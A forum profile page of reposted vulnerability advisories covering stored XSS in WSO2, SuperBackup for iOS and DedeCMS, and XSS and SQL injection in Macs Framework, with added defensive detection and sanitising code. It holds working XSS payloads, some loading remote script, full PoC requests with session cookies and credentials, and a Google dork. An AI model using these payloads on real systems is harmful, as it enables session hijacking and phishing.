
Everything posted by HireHackking
-
WSO2 3.1.0 - Persistent Cross-Site Scripting
# Title: WSO2 3.1.0 - Persistent Cross-Site Scripting
# Date: 2020-04-13
# Author: raki ben hamouda
# Vendor: https://apim.docs.wso2.com
# Software link: https://apim.docs.wso2.com/en/latest/
# CVE: N/A
# Advisory: https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2020-0700

Technical Details & Description:
================================
A remote stored cross-site scripting vulnerability has been discovered in the Resource Browser component of WSO2 API Manager. The vulnerability allows a remote attacker with access to the "Resource Browser" component to inject malicious code through the "Add Comment" feature. It is triggered by sending a POST request to `/carbon/info/comment-ajaxprocessor.jsp` with the parameters "comment=targeted&path=%2F".

Remote attackers can use it to spread malware, to hijack a session (including a session with higher privileges), or to initiate phishing attacks.

The security risk of the stored XSS web vulnerability is estimated as medium, with a CVSS (Common Vulnerability Scoring System) score of 5.4. Exploitation of the stored XSS web vulnerability requires a low-privilege web-application user account and medium or high user interaction. Successful exploitation of the vulnerability results in compromising the server.
Request Method:
[+] POST

Module:
[+] /carbon/info/comment-ajaxprocessor.jsp

Parameters:
[+] comment=admincomment
[+] path=%2F

=======================================
POST /carbon/info/comment-ajaxprocessor.jsp HTTP/1.1
Host: 192.168.149.1:9443
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://192.168.149.1:9443/carbon/resources/resource.jsp?region=region3&item=resource_browser_menu&path=/
X-Requested-With: XMLHttpRequest, XMLHttpRequest
X-Prototype-Version: 1.5.0
Content-type: application/x-www-form-urlencoded; charset=UTF-8
X-CSRF-Token: L4OB-I2K8-W66N-K44H-JNSM-6L0Z-BB17-BGWH
Content-Length: 64
Cookie: region3_registry_menu=visible; region3_metadata_menu=none; wso2.carbon.rememberme=admin-0db64b12-e661-4bc8-929d-6ab2cc7b192e; JSESSIONID=4B3AB3AA8895F2897685FA98C327D521; requestedURI=../../carbon/admin/index.jsp; region1_configure_menu=none; region4_monitor_menu=none; region5_tools_menu=none; current-breadcrumb=registry_menu%252Cresource_browser_menu%2523
Connection: close

comment=%3Ciframe%20href%3Dhttp%3A%2F%2Fphishing_url%3E&path=%2F

==============================
HTTP/1.1 200
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
X-Frame-Options: DENY
vary: accept-encoding
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Date: Tue, 31 Dec 2019 10:50:00 GMT
Connection: close
Server: WSO2 Carbon Server
Content-Length: 3144

// the body of the response includes the attacker's malicious script
<a class="closeButton icon-link registryWriteOperation" onclick="delComment('/','/;comments:33')" id="closeC0" title="Delete" style="background-image: url(../admin/images/delete.gif);position:relative;float:right"> </a>
<iframe href=http://phishing_url>
<br/>
posted on 0m ago (on Tue Dec 31 11:50:00 GMT+01:00 2019) by attacker

Proof of Concept (PoC):
=======================
// Let's suppose we're attacking an admin with higher privileges
1- The attacker opens his account
2- Adds an arbitrary comment
3- Intercepts the request
4- Adds the malicious script to the comment
5- The admin accesses his account and wants to add a comment; the malicious script is executed ===> Admin account compromised
===============================================================================
Example malicious script:
<script>
alert(document.cookie);
</script>
===============================================================================
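From the defender's side, the request above is easy to spot in traffic or application logs. The following Python check is an added example, not code from the advisory or from WSO2: it inspects request records (constructed here to mirror the PoC request) for POSTs to the comment endpoint whose decoded `comment` parameter contains HTML tags. The record shape and function names are assumptions.

```python
"""Flag stored-XSS injection attempts against the WSO2 Carbon comment endpoint.

Added example, not code from the advisory or from WSO2. It inspects request
records (constructed below to mirror the PoC request) and reports any POST to
/carbon/info/comment-ajaxprocessor.jsp whose decoded `comment` parameter
contains HTML tags, so the attempt is visible before an admin opens the
Resource Browser. Record fields and function names are assumptions.
"""
from html.parser import HTMLParser
from typing import List, Optional
from urllib.parse import parse_qs

# Endpoint and parameter named in the advisory.
WATCHED_PATH = "/carbon/info/comment-ajaxprocessor.jsp"
WATCHED_PARAM = "comment"


class _TagCollector(HTMLParser):
    """Collects the name of every start tag the HTML tokenizer recognises."""

    def __init__(self) -> None:
        super().__init__(convert_charrefs=True)
        self.tags: List[str] = []

    def handle_starttag(self, tag, attrs) -> None:
        self.tags.append(tag)

    def handle_startendtag(self, tag, attrs) -> None:
        self.tags.append(tag)


def html_tags_in(value: str) -> List[str]:
    """Return the HTML tag names found in a decoded parameter value.

    Using the real tokenizer rather than a bare '<' test keeps ordinary
    comment text such as '1 < 2' from being flagged.
    """
    collector = _TagCollector()
    collector.feed(value)
    collector.close()
    return collector.tags


def inspect_request(record: dict) -> Optional[dict]:
    """Return an alert for a suspicious comment POST, or None.

    `record` carries method, path, client and the raw urlencoded body, the
    shape a reverse proxy or application log might produce (assumed here).
    """
    if record.get("method") != "POST" or record.get("path") != WATCHED_PATH:
        return None
    # parse_qs URL-decodes once, so %3Ciframe%3E becomes <iframe> here.
    params = parse_qs(record.get("body", ""), keep_blank_values=True)
    for comment in params.get(WATCHED_PARAM, []):
        tags = html_tags_in(comment)
        if tags:
            return {
                "client": record.get("client"),
                "path": record["path"],
                "registry_path": params.get("path", [""])[0],
                "tags": tags,
                "comment": comment,
            }
    return None


def scan(records) -> List[dict]:
    """Run inspect_request over a sequence of records and keep the alerts."""
    return [a for a in (inspect_request(r) for r in records) if a]


# Constructed sample records; the first body is the one shown in the PoC.
SAMPLE_REQUESTS = [
    {"method": "POST", "path": WATCHED_PATH, "client": "192.168.149.50",
     "body": "comment=%3Ciframe%20href%3Dhttp%3A%2F%2Fphishing_url%3E&path=%2F"},
    {"method": "POST", "path": WATCHED_PATH, "client": "192.168.149.51",
     "body": "comment=Looks+fine%2C+1+%3C+2+as+expected&path=%2F"},
    {"method": "GET", "path": "/carbon/resources/resource.jsp",
     "client": "192.168.149.51", "body": ""},
]

if __name__ == "__main__":
    for alert in scan(SAMPLE_REQUESTS):
        print(f"[XSS attempt] {alert['client']} -> {alert['path']} "
              f"tags={alert['tags']} comment={alert['comment']!r}")
```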
-
SuperBackup 2.0.5 for iOS - Persistent Cross-Site Scripting
# Title: SuperBackup 2.0.5 for iOS - Persistent Cross-Site Scripting
# Author: Vulnerability Laboratory
# Date: 2020-04-15
# Vendor: http://dropouts.in/
# Software Link: https://apps.apple.com/us/app/super-backup-export-import/id1052684097
# CVE: N/A

Document Title:
===============
SuperBackup v2.0.5 iOS - (VCF) Persistent XSS Vulnerability

References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2202

Release Date:
=============
2020-04-15

Vulnerability Laboratory ID (VL-ID):
====================================
2202

Common Vulnerability Scoring System:
====================================
4.6

Vulnerability Class:
====================
Cross Site Scripting - Persistent

Current Estimated Price:
========================
500€ - 1.000€

Product & Service Introduction:
===============================
Backup all your iPhone or iPad contacts in 1 tap and export them. Fastest way to restore contacts from PC or Mac. Export by mailing the backed up contacts file to yourself. Export contacts file to any other app on your device. Export all contacts directly to your PC / Mac over Wifi, no software needed! Restore any contacts directly from PC / Mac. Restore contacts via mail. Get the ultimate contacts backup app now.

(Copy of the Homepage: https://apps.apple.com/us/app/super-backup-export-import/id1052684097 )

Abstract Advisory Information:
==============================
The Vulnerability Laboratory core research team discovered multiple persistent cross-site web vulnerabilities in the official SuperBackup v2.0.5 iOS mobile application.
Affected Product(s):
====================
Dropouts Technologies LLP
Product: Super Backup v2.0.5

Vulnerability Disclosure Timeline:
==================================
2020-04-15: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
=================
Published

Exploitation Technique:
=======================
Remote

Severity Level:
===============
Medium

Authentication Type:
====================
Pre auth - no privileges

User Interaction:
=================
Low User Interaction

Disclosure Type:
================
Independent Security Research

Technical Details & Description:
================================
A persistent cross-site scripting web vulnerability has been discovered in the official SuperBackup v2.0.5 iOS mobile application. The vulnerability allows remote attackers to inject their own malicious script code with a persistent attack vector to compromise the mobile web-application from the application side.

The cross-site scripting web vulnerabilities are located in the `newPath`, `oldPath` & `filename` parameters of the vcf listing module. Remote attackers are able to inject their own malicious persistent script code as a vcf filename into the main index list. The request method to inject is POST and the attack vector of the vulnerability is located on the application side. The injection point is the vcf filename or import, and the execution point is the main index list after the import or insert. Remote attackers are able to inject their own script code into the client-side requested vulnerable web-application parameters. The attack vector of the vulnerability is persistent and the request method to inject/execute is POST. The vulnerabilities are classic client-side cross-site scripting vulnerabilities.

Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistent external redirects to malicious sources and persistent manipulation of affected application modules.
Request Method(s):
[+] POST

Vulnerable Module(s):
[+] VCF

Vulnerable Parameter(s):
[+] newPath (path - vcf filename)
[+] oldPath (path - vcf filename)

Proof of Concept (PoC):
=======================
The cross-site scripting vulnerability can be exploited by remote attackers without a privileged user account and with low user interaction. For security demonstration or to reproduce the cross-site scripting vulnerability follow the provided information and steps below to continue.

PoC: Payload (Filename)
>"<iframe%20src=evil.source%20onload=alert("PWND")></iframe>

PoC: Vulnerable Source (Listing - Index)
<button type="button" class="btn btn-default btn-xs button-download">
<span class="glyphicon glyphicon-download-alt"></span>
</button>
</td>
<td class="column-name"><p class="edit" title="Click to rename...">Contacts 09:17:12:PM 10:Apr.:2020 .vcf</p></td>
<td class="column-size">
<p>26.40 KB</p>
</td>
<td class="column-delete">
<button type="button" class="btn btn-danger btn-xs button-delete">
<span class="glyphicon glyphicon-trash"></span>
</button>
</td>
</tr></tbody></table>
</div>

PoC: Exception-Handling
Internal Server Error: Failed moving "/Contacts 09:17:12:PM 10:Apr.:2020 .vcf" to "/Contacts >"<iframe src=evil.source onload=alert("PWND")></iframe> 09:17:12:PM 10:Apr.:2020 .vcf"
-
Internal Server Error: Failed moving "/Contacts 09:17:12:PM 10:Apr.:2020 .vcf" to "/Contacts 09:17:12:PM 10:Apr.:2020 >"<iframe src=evil.source onload=alert("PWND")></iframe> .vcf"
-
Internal Server Error: Failed moving "/Contacts 09:17:12:PM 10:Apr.:2020 .vcf" to "/Contacts >"<iframe src=evil.source onload=alert("PWND")></iframe>09:17:12:PM 10:Apr.:2020 .vcf"

PoC: Exploit
BEGIN:VCARD
VERSION:3.0
PRODID:-//Apple Inc.//iPhone OS 12.4.5//EN
B:Kunz Mejri ;>"<iframe src=evil.source onload=alert("PWND")></iframe> ;;;
END:VCARD

--- PoC Session Logs [POST] ---
http://localhost/move
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 187
Origin: http://localhost
Connection: keep-alive
Referer: http://localhost/
oldPath=/Contacts 09:17:12:PM 10:Apr.:2020 .vcf&newPath=/evil-filename>"<iframe src=evil.source onload=alert("PWND")></iframe>.vc
-
POST: HTTP/1.1 500 Internal Server Error
Content-Length: 593
Content-Type: text/html; charset=utf-8
Connection: Close
Server: GCDWebUploader
-
http://localhost/evil.source
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://localhost/
-
GET: HTTP/1.1 200 OK
Server: GCDWebUploader
Connection: Close

Solution - Fix & Patch:
=======================
1. Parse and filter the vcf name values on add, edit or import to prevent an execution
2. Restrict and filter the vcf names in the index listing to sanitize the output

Security Risk:
==============
The security risk of the persistent vcf cross-site scripting web vulnerability is estimated as medium.

Credits & Authors:
==================
Vulnerability-Lab - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
Benjamin Kunz Mejri - https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.

Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.

Domains: www.vulnerability-lab.com www.vuln-lab.com www.vulnerability-db.com
Services: magazine.vulnerability-lab.com paste.vulnerability-db.com infosec.vulnerability-db.com
Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php vulnerability-lab.com/rss/rss_upcoming.php vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php vulnerability-lab.com/register.php vulnerability-lab.com/list-of-bug-bounty-programs.php

Any modified copy or reproduction, including partial usage, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website are trademarks of the vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@ or research@) to ask for permission.

Copyright © 2020 | Vulnerability Laboratory - [Evolution Security GmbH]™

--
VULNERABILITY LABORATORY - RESEARCH TEAM
-
DedeCMS 7.5 SP2 - Persistent Cross-Site Scripting
# Title: DedeCMS 7.5 SP2 - Persistent Cross-Site Scripting
# Author: Vulnerability Laboratory
# Date: 2020-04-15
# Vendor Link: http://www.dedecms.com
# Software Link: http://www.dedecms.com/products/dedecms/downloads/
# CVE: N/A

Document Title:
===============
DedeCMS v7.5 SP2 - Multiple Persistent Web Vulnerabilities

References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2195

Release Date:
=============
2020-04-09

Vulnerability Laboratory ID (VL-ID):
====================================
2195

Common Vulnerability Scoring System:
====================================
4.3

Vulnerability Class:
====================
Cross Site Scripting - Persistent

Current Estimated Price:
========================
500€ - 1.000€

Product & Service Introduction:
===============================
Welcome to use the most professional PHP website content management system in China-Zhimeng content management system, he will be your first choice for easy website building. Adopt XML name space style core templates: all templates are saved in file form, which provides great convenience for users to design templates and website upgrade transfers. The robust template tags provide strong support for webmasters to DIY their own websites. High-efficiency tag caching mechanism: Allows the caching of similar tags. When generating HTML, it helps to improve the reaction speed of the system and reduce the resources consumed by the system.

(Copy of the homepage: http://www.dedecms.com/products/dedecms/downloads/)

Abstract Advisory Information:
==============================
The Vulnerability Laboratory core research team discovered multiple persistent cross-site vulnerabilities in the official DedeCMS v5.7 SP2 (UTF8) web-application.

Affected Product(s):
====================
DesDev Inc.
Product: DedeCMS - Content Management System v5.7 SP2

Vulnerability Disclosure Timeline:
==================================
2020-04-09: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
=================
Published

Exploitation Technique:
=======================
Remote

Severity Level:
===============
Medium

Authentication Type:
====================
Restricted authentication (user/moderator) - User privileges

User Interaction:
=================
Low User Interaction

Disclosure Type:
================
Independent Security Research

Technical Details & Description:
================================
Multiple persistent cross-site scripting vulnerabilities have been discovered in the official DedeCMS v5.7 SP2 UTF8 web-application. The vulnerability allows remote attackers to inject their own malicious script code with a persistent attack vector to compromise browser-to-web-application requests from the application side.

The persistent script code injection web vulnerabilities are located in the `activepath`, `keyword`, `tag`, `fmdo=x&filename`, `CKEditor` and `CKEditorFuncNum` parameters of the `file_pic_view.php`, `file_manage_view.php`, `tags_main.php`, `select_media.php` and `media_main.php` files. The attack vector of the vulnerability is non-persistent and the request method to inject is POST.

Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistent external redirects to malicious sources and persistent manipulation of affected or connected application modules.
Request Method(s):
[+] POST

Vulnerable File(s):
[+] file_pic_view.php
[+] file_manage_view.php
[+] tags_main.php
[+] select_media.php
[+] media_main.php

Vulnerable Parameter(s):
[+] tag
[+] keyword
[+] activepath
[+] fmdo=move&filename & fmdo=edit&filename
[+] CKEditor & CKEditor=body&CKEditorFuncNum

Proof of Concept (PoC):
=======================
The web vulnerabilities can be exploited by remote attackers with a privileged user account and with low user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.

Request: Examples
https://test23.localhost:8080/dede/file_manage_view.php?fmdo=move&filename=test&activepath=%2Fuploads
https://test23.localhost:8080/dede/tags_main.php?tag=&orderby=total&orderway=desc
https://test23.localhost:8080/include/dialog/select_media.php?CKEditor=body&CKEditorFuncNum=2&langCode=en

PoC: Payload
".>"<img>"%20<img src=[Evil.Domain]/[Evil.Source].* onload=alert(document.domain)>
>"%20<"<img="" src="https:/www.vulnerability-lab.com/gfx/logo-header.png onload=alert(document.domain)">
>"><iframe src=evil.source onload=alert(document.domain)>
%22%3E%3Ciframe%20src=%22https://vuln-lab.com/evil.js%22%3E
%3E%22%3E%3Ciframe%20src=%22x%22%20onload=alert(document.domain)%3E%3Cimg%3E
%3E%22%3Cimg%20src=%22[Evil.Source]%22%3E%3Cimg%20src=%22[Evil.Source]%22%3E

PoC: Exploitation
<title>DedeCMS v5.7 SP2 UTF8 - Multiple Non Persistent XSS PoCs</title>
<iframe src="https://test23.localhost:8080/dede/file_pic_view.php?activepath=%2Fuploads%3E%22%3Cimg%20src=%22[Evil.Source]%22%3E%3Cimg%20src=%22[Evil.Source]%22%3E">
<iframe src="https://test23.localhost:8080/dede/file_manage_view.php?fmdo=move&filename=%3E%22%3E%3Ciframe%20src=%22x%22%20onload=alert(document.domain)%3E%3Cimg%3E&activepath=%2Fuploads">
<iframe src="https://test23.localhost:8080/dede/file_manage_view.php?fmdo=move&filename=test&activepath=%3E%22%3E%3Ciframe%20src=%22x%22%20onload=alert(document.domain)%3E%3Cimg%3E">
<iframe src="https://test23.localhost:8080/dede/tags_main.php?tag=pwnd&orderway=%22%3E%3Ciframe%20src=%22https://vuln-lab.com/evil.js%22%3E">
<iframe src="https://test23.localhost:8080/dede/tags_main.php?tag=%22%3E%3Ciframe%20src=%22https://vuln-lab.com/evil.js%22%3E&orderby=1&orderway=">
<iframe src="https://test23.localhost:8080/include/dialog/select_media.php?CKEditor=>"><iframe src=evil.source onload=alert(document.domain)>body&CKEditorFuncNum=2&langCode=en">
<iframe src="https://test23.localhost:8080/include/dialog/select_media.php?CKEditor=body&CKEditorFuncNum=>"><iframe src=evil.source onload=alert(document.domain)>2&langCode=en">
...

--- PoC Session Logs [POST] --- (Some Examples ...)
https://test23.localhost:8080/dede/media_main.php
Host: test23.localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 152
Origin: https://test23.localhost:8080
Authorization: Basic dGVzdGVyMjM6Y2hhb3M2NjYhISE=
Connection: keep-alive
Referer: https://test23.localhost:8080/dede/media_main.php
Cookie: menuitems=1_1%2C2_1%2C3_1; PHPSESSID=2et4s8ep51lasddnshjcco5ji3; DedeUserID=1; DedeUserID__ckMd5=936f42b01c3c7958; DedeLoginTime=1586191031; DedeLoginTime__ckMd5=37af65fa4635a14f; ENV_GOBACK_URL=%2Fdede%2Fmedia_main.php
keyword=>"%20<<img src=https://[Evil.Domain]/[Evil.Source].png>&mediatype=0&membertype=0&imageField.x=23&imageField.y=4
-
POST: HTTP/2.0 200 OK
server: nginx
content-type: text/html; charset=utf-8
content-length: 1830
expires: Thu, 19 Nov 1981 08:52:00 GMT
pragma: no-cache
cache-control: private
set-cookie: ENV_GOBACK_URL=%2Fdede%2Fmedia_main.php; expires=Mon, 06-Apr-2020 17:53:23 GMT; Max-Age=3600; path=/
vary: Accept-Encoding
content-encoding: gzip
x-powered-by: PHP/5.6.40, PleskLin
X-Firefox-Spdy: h2
---
https://test23.localhost:8080/dede/file_pic_view.php?activepath=%2Fuploads%2F>" <"<img+src%3Dhttps%3A%2F%2Fwww.vulnerability-lab.com%2Fgfx%2Flogo-header.png>&imageField.x=0&imageField.y=0
Host: test23.localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Authorization: Basic dGVzdGVyMjM6Y2hhb3M2NjYhISE=
Connection: keep-alive
Referer: https://test23.localhost:8080/dede/file_pic_view.php?activepath=&imageField.x=0&imageField.y=0
Cookie: menuitems=1_1%2C2_1%2C3_1; PHPSESSID=2et4s8ep51lasddnshjcco5ji3; DedeUserID=1; DedeUserID__ckMd5=936f42b01c3c7958; DedeLoginTime=1586191031; DedeLoginTime__ckMd5=37af65fa4635a14f; ENV_GOBACK_URL=%2Fdede%2Fmedia_main.php%3Fdopost%3Dfilemanager
Upgrade-Insecure-Requests: 1
-
GET: HTTP/2.0 200 OK
server: nginx
content-type: text/html; charset=utf-8
x-powered-by: PHP/5.6.40
expires: Thu, 19 Nov 1981 08:52:00 GMT
pragma: no-cache
cache-control: private
X-Firefox-Spdy: h2
---
https://test23.localhost:8080/include/dialog/select_media.php?CKEditor=>"><iframe src=evil.source onload=alert("1")>body&CKEditorFuncNum=>"><iframe src=evil.source onload=alert("2")>2&langCode=en
Host: test23.localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Authorization: Basic dGVzdGVyMjM6Y2hhb3M2NjYhISE=
Connection: keep-alive
Cookie: PHPSESSID=2et4s8ep51lasddnshjcco5ji3; DedeUserID=1; DedeUserID__ckMd5=936f42b01c3c7958; DedeLoginTime=1586191031; DedeLoginTime__ckMd5=37af65fa4635a14f; ENV_GOBACK_URL=%2Fdede%2Ffeedback_main.php
Upgrade-Insecure-Requests: 1
-
GET: HTTP/2.0 200 OK
server: nginx
content-type: text/html; charset=utf-8
content-length: 1137
expires: Thu, 19 Nov 1981 08:52:00 GMT
cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
pragma: no-cache
vary: Accept-Encoding
content-encoding: gzip
x-powered-by: PHP/5.6.40, PleskLin
X-Firefox-Spdy: h2

Reference(s):
https://test23.localhost:8080/dede/media_main.php
https://test23.localhost:8080/dede/tags_main.php
https://test23.localhost:8080/dede/file_pic_view.php
https://test23.localhost:8080/dede/file_manage_view.php
https://test23.localhost:8080/include/dialog/select_media.php

Solution - Fix & Patch:
=======================
1. Parse the content to disallow HTML / JS and special chars in the affected input fields
2. Restrict the vulnerable parameters to prevent injects via POST method requests
3. Secure the output locations where the content is delivered as output without proper sanitization

Security Risk:
==============
The security risk of the application-side persistent cross-site scripting web vulnerabilities in the different modules is estimated as medium.
Credits & Authors:
==================
Vulnerability-Lab - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
Benjamin Kunz Mejri - https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.

--
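The "Solution - Fix & Patch" lists of the SuperBackup and DedeCMS advisories above both come down to the same two controls: validate a user-supplied name when it is stored, and encode every untrusted value at the point where it is rendered, error pages included (the SuperBackup 500 response echoed the raw filename back). The following Python is an added example, not code from either vendor or from the advisories; the function names, the allowlist and the row template are assumptions for the demo.

```python
"""Keep user-controlled file names inert at the storage and output boundaries.

Added example, not the code of SuperBackup, DedeCMS or any advisory author.
It implements the two fix items both "Solution - Fix & Patch" lists describe:
validate the name when it is stored (the newPath of the /move request) and
encode every untrusted value where it is rendered, including the
"Failed moving" error message that echoed the raw name in the PoC.
Function names, the allowlist and the row template are assumptions.
"""
import html
import re
from typing import Optional

# Allowlist for a contacts export name: Unicode letters/digits, space and a few
# punctuation marks. The legitimate PoC name "Contacts 09:17:12:PM 10:Apr.:2020 .vcf"
# fits; anything carrying < > " ' = or a path separator does not.
_ALLOWED_NAME = re.compile(r"[\w .:()\-]+")
MAX_NAME_LEN = 255


def vcf_name_problem(name: str) -> Optional[str]:
    """Return why `name` must not be stored as a .vcf name, or None if it is fine.

    Validation keeps hostile names out of the store and the file system, but it
    is not the XSS fix on its own: the output encoding below still applies.
    """
    stripped = name.strip()
    if not stripped or stripped in (".", ".."):
        return "empty or reserved name"
    if len(stripped) > MAX_NAME_LEN:
        return "name longer than %d characters" % MAX_NAME_LEN
    if not _ALLOWED_NAME.fullmatch(stripped):
        return "name contains characters outside the allowlist"
    if not stripped.lower().endswith(".vcf"):
        return "only .vcf files may be stored"
    return None


def render_listing_row(name: str, size_kb: float) -> str:
    """Render one listing row with the name encoded for both HTML contexts.

    In the vulnerable markup the name sits as text inside <p> and is reused in
    a title attribute. html.escape(quote=True) turns < > & " and ' into
    entities, which is safe in both contexts as long as the attribute is quoted.
    """
    safe = html.escape(name, quote=True)
    return (
        "<tr>"
        f'<td class="column-name"><p class="edit" title="Click to rename {safe}">{safe}</p></td>'
        f'<td class="column-size"><p>{size_kb:.2f} KB</p></td>'
        "</tr>"
    )


def render_move_error(old_path: str, new_path: str) -> str:
    """Error responses are output too: encode the paths before echoing them."""
    return (
        "Failed moving "
        f"&quot;{html.escape(old_path, quote=True)}&quot; to "
        f"&quot;{html.escape(new_path, quote=True)}&quot;"
    )


def handle_move(old_path: str, new_path: str) -> dict:
    """Model the /move handler: reject a bad target name before touching storage.

    Returns a minimal response dict; a real handler would perform the rename
    only on the 200 path.
    """
    problem = vcf_name_problem(new_path.lstrip("/"))
    if problem:
        body = render_move_error(old_path, new_path) + " - " + html.escape(problem)
        return {"status": 400, "body": body}
    return {"status": 200, "body": ""}


if __name__ == "__main__":
    # Constructed inputs: the PoC filename payload next to a legitimate name.
    payload = '>"<iframe src=evil.source onload=alert("PWND")></iframe>'
    print(render_listing_row("Contacts " + payload + " .vcf", 26.40))
    print(handle_move("/Contacts 09:17:12:PM 10:Apr.:2020 .vcf", "/Contacts " + payload + " .vcf"))
```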
-
Macs Framework 1.14f CMS - Persistent Cross-Site Scripting
# Title: Macs Framework 1.14f CMS - Persistent Cross-Site Scripting
# Author: Vulnerability Laboratory
# Date: 2020-04-15
# Software Link: https://sourceforge.net/projects/macs-framework/files/latest/download
# CVE: N/A

Document Title:
===============
Macs Framework v1.14f CMS - Multiple Web Vulnerabilities

References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2206

Release Date:
=============
2020-04-14

Vulnerability Laboratory ID (VL-ID):
====================================
2206

Common Vulnerability Scoring System:
====================================
7.4

Vulnerability Class:
====================
Multiple

Current Estimated Price:
========================
1.000€ - 2.000€

Product & Service Introduction:
===============================
Macs CMS is a Flat File (XML and SQLite) based AJAX Content Management System. It focuses mainly on the Edit In Place editing concept. It comes with a built in blog with moderation support, user manager section, roles manager section, SEO / SEF URL.
https://sourceforge.net/projects/macs-framework/files/latest/download

(Copy of the Homepage: https://sourceforge.net/projects/macs-framework/ )

Abstract Advisory Information:
==============================
The Vulnerability Laboratory core research team discovered multiple web vulnerabilities in the official Macs Framework v1.1.4f CMS.
Affected Product(s):
====================
Macrob7
Product: Macs Framework v1.14f - Content Management System

Vulnerability Disclosure Timeline:
==================================
2020-04-14: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
=================
Published

Exploitation Technique:
=======================
Remote

Severity Level:
===============
High

Authentication Type:
====================
Restricted authentication (user/moderator) - User privileges

User Interaction:
=================
Low User Interaction

Disclosure Type:
================
Independent Security Research

Technical Details & Description:
================================
1.1 & 1.2
Multiple non-persistent cross-site scripting web vulnerabilities have been discovered in the official Mac Framework v1.1.4f Content Management System. The vulnerability allows remote attackers to manipulate client-side browser-to-web-application requests to compromise user session credentials or to manipulate module content.

The first vulnerability is located in the search input field of the search module. Remote attackers are able to inject their own malicious script code as a search entry to execute the code within the results page that is loaded shortly after the request is performed. The request method to inject is POST and the attack vector is located on the client side with a non-persistent attack vector.

The second vulnerability is located in the email input field of the account reset function. Remote attackers are able to inject their own malicious script code as the email used to reset the password, and the code executes within the performed request. The request method to inject is POST and the attack vector is located on the client side with a non-persistent attack vector.

Successful exploitation of the vulnerabilities results in session hijacking, non-persistent phishing attacks, non-persistent external redirects to malicious sources and non-persistent manipulation of affected or connected application modules.
Request Method(s):
[+] POST

Vulnerable Parameter(s):
[+] searchString
[+] emailAdress

1.3
Multiple remote SQL injection web vulnerabilities have been discovered in the official Mac Framework v1.1.4f Content Management System. The vulnerability allows remote attackers to inject or execute their own SQL commands to compromise the DBMS or file system of the application.

The SQL injection vulnerabilities are located in the `roleId` and `userId` parameters of the `editRole` and `deleteUser` modules. The request method to inject or execute commands is GET and the attack vector is located on the application side. Attackers with privileged accounts that may edit are able to inject their own SQL queries via roleId and userId on deleteUser or editRole. Multiple unhandled and broken SQL queries are also visible to users as default debug output.

Exploitation of the remote SQL injection vulnerability requires no user interaction and a privileged web-application user account. Successful exploitation of the remote SQL injection results in database management system, web-server and web-application compromise.

Request Method(s):
[+] POST

Vulnerable Module(s):
[+] deleteUser
[+] editRole

Vulnerable Parameter(s):
[+] userId
[+] roleId

Proof of Concept (PoC):
=======================
Google Dork(s): intitle, subtitle & co.
Site Powered by Mac's PHP MVC Framework
Framework of the future
Design downloaded from Zeroweb.org: Free website templates, layouts, and tools.

1.1
